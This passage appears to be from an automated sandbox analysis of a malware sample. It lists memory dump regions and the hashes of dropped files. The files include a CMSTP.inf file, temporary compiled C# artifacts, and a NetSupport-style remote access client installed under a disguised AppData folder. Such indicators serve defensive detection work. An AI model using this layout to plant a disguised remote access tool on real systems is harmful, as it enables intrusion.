| SHA512 | 05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7 |
memory/1368-158-0x00000000717D0000-0x0000000071F80000-memory.dmp
memory/2944-159-0x00000000717D0000-0x0000000071F80000-memory.dmp
memory/2944-160-0x0000000000BA0000-0x0000000000BB0000-memory.dmp
memory/4572-162-0x0000000004CB0000-0x0000000004CC0000-memory.dmp
memory/4572-161-0x00000000717D0000-0x0000000071F80000-memory.dmp
memory/4572-163-0x0000000004CB0000-0x0000000004CC0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3fc4824e0a712206096191f319e6d6a9 |
| SHA1 | b546e0633e242d2bcb287a0d55baffb3d2e07f10 |
| SHA256 | 8c2d4f119b4d5fa2ac1639a33717f1c086afd0154c524c21979868f04314455b |
| SHA512 | 404c05fb107d25c9834865c377afe079eb0a8180140eb6a78c54e2f87fb776c9602c3bbe3ca39721f943cec68750c53d46732cc019fcee348060f276a221ce49 |
memory/2944-184-0x0000000006EA0000-0x0000000006EE4000-memory.dmp
memory/4572-183-0x0000000004CB0000-0x0000000004CC0000-memory.dmp
memory/4572-185-0x0000000007A40000-0x00000000080BA000-memory.dmp
memory/2944-186-0x0000000007020000-0x0000000007096000-memory.dmp
memory/2944-187-0x0000000000BA0000-0x0000000000BB0000-memory.dmp
memory/4572-189-0x00000000717D0000-0x0000000071F80000-memory.dmp
memory/2944-191-0x00000000717D0000-0x0000000071F80000-memory.dmp
memory/2944-192-0x0000000000BA0000-0x0000000000BB0000-memory.dmp
memory/2944-193-0x0000000000BA0000-0x0000000000BB0000-memory.dmp
memory/2944-195-0x0000000007E20000-0x0000000007E52000-memory.dmp
memory/2944-196-0x000000006E090000-0x000000006E0DC000-memory.dmp
memory/2944-197-0x000000006E1F0000-0x000000006E544000-memory.dmp
memory/2944-207-0x0000000007E00000-0x0000000007E1E000-memory.dmp
memory/2944-208-0x0000000007F50000-0x0000000007F5A000-memory.dmp
memory/2944-209-0x0000000007FC0000-0x0000000007FD2000-memory.dmp
memory/2944-210-0x0000000007FA0000-0x0000000007FAA000-memory.dmp
memory/2944-233-0x0000000000BA0000-0x0000000000BB0000-memory.dmp
memory/4784-236-0x00000000717D0000-0x0000000071F80000-memory.dmp
memory/4784-237-0x0000000004A60000-0x0000000004A70000-memory.dmp
memory/4784-238-0x0000000004A60000-0x0000000004A70000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3111b8507c855bf0afb1b82a6ceb5a3b |
| SHA1 | 09336fa120984ba60e90b8098780de5bc52edae8 |
| SHA256 | 5b7a0fce85b816dd25edcf6e2a0224ab18411c510ec769cddb7859f5dce52ace |
| SHA512 | 171fb43f81c1643204d77291e2e02c91a79677d109365a726293d2fd0b63e7de419e484715bbf5992c7c3ce17f45ecb4fd20e3970f283eb2a3301e7a65c00d36 |
memory/4784-249-0x0000000004A60000-0x0000000004A70000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\beumlt25\beumlt25.cmdline
| MD5 | 29a3f8c092a3b0faa5b6d042e1c978b0 |
| SHA1 | ed601829698514b97f8d9a4f70ace829f9478fb3 |
| SHA256 | 55333cb538988a084f429900f2168606489020e5821a2ff47b02e18522fddce3 |
| SHA512 | a948e44aec0a83aadfea494a52710c444b02f607e3238a7415526d000d70392fe91777059f3b94f29ec995b9be44a33158281068985cf0076134a4927c8991fa |
\??\c:\Users\Admin\AppData\Local\Temp\beumlt25\beumlt25.0.cs
| MD5 | 7fbb3f2ac5a0040e7e42f8fc7cd6fbfe |
| SHA1 | 93fcde99bba753677f8786fbcdba4d695296bd12 |
| SHA256 | d3f7e6731d46ba381595954053ae69cf2cc2fa91c2a27ed8ed5154bebcd0f5d2 |
| SHA512 | 3fe646607615f671d2aa1470a4c7ac0c55a463b56c210a8e1658a8961d2ff453647c7517cf4abed47f6d6f9679f9f67e08e02bf0515410fddd64545d3c4145f8 |
\??\c:\Users\Admin\AppData\Local\Temp\beumlt25\CSCF5AF3DF95E0D4AF7A03E278C2DF0CAFC.TMP
| MD5 | 99098e74c736af4c6091d654bf437908 |
| SHA1 | fbdd75270a2a3199c06d500f375ac8a93d017d61 |
| SHA256 | 736ab241ff665485982d66aca09acba8310e0a802564a4bf1b23b318d641f041 |
| SHA512 | e853007e310ff3698686283628cb7a04b223468776ab622c0e4ad50e7cc722b7011de5fbd678ce32e356256e495133bcf8261e2807f82ca30e59fcc08d167308 |
C:\Users\Admin\AppData\Local\Temp\RES42F0.tmp
| MD5 | e3c3a4cd024da909b42bf03908660705 |
| SHA1 | adb77c2454224fbbde4c497cbd9b293df83a35f7 |
| SHA256 | 6917fd549295e47b30ee7be69d1c0fe21f01754330844aa0c8402146d7399944 |
| SHA512 | f665c38caf1059c06938830b393d09d3a0a282b622d2def10278eb78ec023a8831442fb40c122297371f13009447612e2e12a0194075d86cbc1791d7fa6bd0f3 |
C:\Users\Admin\AppData\Local\Temp\beumlt25\beumlt25.dll
| MD5 | 66637d2c99c6e40bc6192f1efc4e0f2e |
| SHA1 | 9347c1d7d9bcaac204ca664577ae6381c1f74100 |
| SHA256 | 64d079edcf82466a380644a127fa159a60c25527140846db5fe11dbf1e9dcd6b |
| SHA512 | 15b7aed37f2269603a902adcc44a94905d0a7a8d4aec34488527027282f0432095ce3950d2d9b12ebb3485939575ec96138791383ae202e3cae48f29a6850b13 |
C:\Users\Admin\AppData\Local\Temp\CMSTP.inf
| MD5 | efb6f1e28f266bb33cb2b76be37cc491 |
| SHA1 | f4cf1bafdccb11486ff7e5e877246e957cae90db |
| SHA256 | d3e346fcadf02b7dcac1f2501434ebca5199be3775fbce22497e08b43ddc14bf |
| SHA512 | 259b297a8b0739cf6b2b6e7a3f0eba391b99e7346f333ab33b3e67554447609706a3268c34c2e4cabe31d970764d462b1cda25bb7c5416d846dad4092b2d0546 |
memory/4784-266-0x00000000717D0000-0x0000000071F80000-memory.dmp
memory/2944-267-0x000000007EF70000-0x000000007EF80000-memory.dmp
memory/4596-270-0x00000000717D0000-0x0000000071F80000-memory.dmp
memory/4596-271-0x0000000002B20000-0x0000000002B30000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 41df442e734dce300c0e13bef9a7da8a |
| SHA1 | 7593cd0d7c3f4e64d6049faeb04a5475b610a331 |
| SHA256 | 173d3c0fc3c7dc8314848e1cad752e74a3d75089ebd997275cf2237fd6153aa4 |
| SHA512 | b38f023812a47cf001d07fb33a72ebdf81b697342d31db55d6a9824809779ba099d84a83a7cb140a7db643f4ab7645d151da3fa7e566061ad741b407c7709376 |
memory/2944-284-0x00000000717D0000-0x0000000071F80000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | bb7c45699212b8d044800fe3083e69eb |
| SHA1 | c7c2f2122674983ae23e51409abe2e4d26ac4823 |
| SHA256 | 960c36ba2442c541fa02f3035ed2e34051d6ffc77c241e719d212e9883efd7cf |
| SHA512 | 78557adba71183bc3f3f7d7ffbc69de502f19046617c4e8a4390316daf5e4eec4652e22416bd46d2beb20fbf3b7b7cf7ea565ff2fce1d2f5085b8e00766183dd |
memory/4596-286-0x0000000002B20000-0x0000000002B30000-memory.dmp
C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe
| MD5 | 8d9709ff7d9c83bd376e01912c734f0a |
| SHA1 | e3c92713ce1d7eaa5e2b1fabeb06cdc0bb499294 |
| SHA256 | 49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3 |
| SHA512 | 042ad89ed2e15671f5df67766d11e1fa7ada8241d4513e7c8f0d77b983505d63ebfb39fefa590a2712b77d7024c04445390a8bf4999648f83dbab6b0f04eb2ee |
C:\Users\Admin\AppData\Roaming\IonicBaseband\PCICL32.DLL
| MD5 | 00587238d16012152c2e951a087f2cc9 |
| SHA1 | c4e27a43075ce993ff6bb033360af386b2fc58ff |
| SHA256 | 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 |
| SHA512 | 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226 |
C:\Users\Admin\AppData\Roaming\IonicBaseband\pcicapi.dll
| MD5 | dcde2248d19c778a41aa165866dd52d0 |
| SHA1 | 7ec84be84fe23f0b0093b647538737e1f19ebb03 |
| SHA256 | 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 |
| SHA512 | c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166 |
C:\Users\Admin\AppData\Roaming\IonicBaseband\PCICHEK.DLL
| MD5 | a0b9388c5f18e27266a31f8c5765b263 |
| SHA1 | 906f7e94f841d464d4da144f7c858fa2160e36db |
| SHA256 | 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a |
| SHA512 | 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd |
C:\Users\Admin\AppData\Roaming\IonicBaseband\msvcr100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\Roaming\IonicBaseband\MSVCR100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\Roaming\IonicBaseband\pcichek.dll
| MD5 | a0b9388c5f18e27266a31f8c5765b263 |
| SHA1 | 906f7e94f841d464d4da144f7c858fa2160e36db |
| SHA256 | 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a |
| SHA512 | 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd |
C:\Users\Admin\AppData\Roaming\IonicBaseband\PCICL32.dll
| MD5 | 00587238d16012152c2e951a087f2cc9 |
| SHA1 | c4e27a43075ce993ff6bb033360af386b2fc58ff |
| SHA256 | 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 |
| SHA512 | 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226 |
C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.ini
| MD5 | c2fcdcd6299b04fbef530d7b144181d8 |
| SHA1 | 43d8a39fb9a78b244b6740ac654be9fe84d32d31 |
| SHA256 | 4536ff38e0ad3191aa7682ae532660f1b51d3d7f8dbcabb90fe9bdfa12eaada5 |
| SHA512 | 4335f0721aeceaf3ce8aa492aea2f66d8dc1930d2963395d7c13768cc0d772d9cf3bdda4e00ad2335d919dfc430022eb64bf6157c2811175844cebf1629917cb |
C:\Users\Admin\AppData\Roaming\IonicBaseband\NSM.LIC
| MD5 | 7067af414215ee4c50bfcd3ea43c84f0 |
| SHA1 | c331d410672477844a4ca87f43a14e643c863af9 |
| SHA256 | 2050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12 |
| SHA512 | 17b888087192bcea9f56128d0950423b1807e294d1c4f953d1bf0f5bd08e5f8e35afeee584ebf9233bfc44e0723db3661911415798159ac118c8a42aaf0b902f |
C:\Users\Admin\AppData\Roaming\IonicBaseband\pcicapi.dll
| MD5 | dcde2248d19c778a41aa165866dd52d0 |
| SHA1 | 7ec84be84fe23f0b0093b647538737e1f19ebb03 |
| SHA256 | 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 |
| SHA512 | c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166 |
C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe
| MD5 | 8d9709ff7d9c83bd376e01912c734f0a |
| SHA1 | e3c92713ce1d7eaa5e2b1fabeb06cdc0bb499294 |
| SHA256 | 49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3 |
| SHA512 | 042ad89ed2e15671f5df67766d11e1fa7ada8241d4513e7c8f0d77b983505d63ebfb39fefa590a2712b77d7024c04445390a8bf4999648f83dbab6b0f04eb2ee |
C:\Users\Admin\AppData\Roaming\IonicBaseband\HTCTL32.DLL
| MD5 | 2d3b207c8a48148296156e5725426c7f |
| SHA1 | ad464eb7cf5c19c8a443ab5b590440b32dbc618f |
| SHA256 | edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 |
| SHA512 | 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c |
C:\Users\Admin\AppData\Roaming\IonicBaseband\HTCTL32.DLL
| MD5 | 2d3b207c8a48148296156e5725426c7f |
| SHA1 | ad464eb7cf5c19c8a443ab5b590440b32dbc618f |
| SHA256 | edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 |
| SHA512 | 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c |
memory/4596-302-0x00000000717D0000-0x0000000071F80000-memory.dmp